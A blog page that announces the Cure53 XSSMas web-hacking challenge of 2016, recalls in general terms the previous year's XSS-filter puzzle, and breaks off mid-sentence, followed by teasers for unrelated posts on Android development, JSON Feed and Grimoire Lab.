Skip to main content

Cure53 XSSMas Hacking Challenge 2016 Underway

Cure53 XSSMas Challenge, initiated in 2013, is a recurring hacking event, where those challenged have to solve a complex security puzzle in order to win money and fame, attempting to hack a web site in any means necessary.

'Any means', does not preclude rules of engagement. For example the 2015 challenge required hacking without user interaction, i.e setting a XSS trap and waiting for it to be activated as in the case of blind XSS.

So as not to spoil your fun with this year's challenge, which has been posted today, here we'll look back to last year's challenge required hackers to begin with index.php and progressively break through index3.php in order to obtain the price.
What was actually required is nicely summed up in:
  • Find a way to bypass the XSS filters of all browsers by realizing, the string
Labels:

Comments

Post a Comment

Popular posts from this blog

Insider's Guide To Udacity Android Developer Nanodegree Part 3 - Making the Baking App

Continuing to chart my experience of Udacity's Android Developer Nanodegree we step up in level, embarking on the advanced part of the super-course.
Completing project "Popular Movies" (see Part 2 of this series) signaled the end of "Android Developer". Now we are ready to tackle the second element of the program "Advanced Android Developer", a new class with a new syllabus and project. Continuing to chart my experience of Udacity's Android Developer Nanodegree we step up in level, embarking on the advanced part of the super-course.

Completing project "Popular Movies" (see Part 2 of this series) signaled the end of "Android Developer". Now we are ready to tackle the second element of the program "Advanced Android Developer", a new class with a new syllabus and project.

"Advanced Android Developer" is a mixed bag of self contained material and of coding seven different sample apps to learn about the…
Post a Comment
Read more

JSON Feed - The New RSS?

SON Feed is a new take on the web syndication format, but unlike RSS and Atom it's in JSON, not XML. So what does it try to do better?

Mainly overcome the perils of XML; it's complex, heavyweight, difficult to parse and not in sync with the current trend wanting web data exchange happening almost exclusively in JSON document representation.

In contrast, JSON is easier to both write and parse, manipulate and consume, especially given that its data types are exact reflections of their native Javascript counterparts.
Devised by Brent Simmons, the original developer of the popular NetNewsWire and Manton Reece creator of Micro Blogs, both with a great background on publishing with RSS, it's a certainty that JSON Feed will emerge as a strong competitor to both Atom and RSS, being based upon their decade long experience on decentralized formats.

On top of that it also tries to tackle a few other issues plaguing RSS, mainly the lack of realtime client notification whe…
Post a Comment
Read more

Grimoire Lab-GitHub - Stats On Steroids

Grimoire Lab is an open source toolkit built on Python, Elasticsearch and Kibana. It taps into GitHub's raw data through Perceval, a module designed for retrieving data from repositories related to software development.

Perceval forwards the data to another tool for filtering, the so called Sorting Hat, responsible for managing and merging identities that correspond to the same real person/commiter and potentially come from different sources, before finally rendering the data manageable and accessible through rich UI Kibiter dashboards. Kibiter, a fork of Kibana, is what enables the user to create and edit visualizations as well as perform queries facilitated by the underlying Elasticsearch REST APIs.

full article on i-programmer.info
Post a Comment
Read more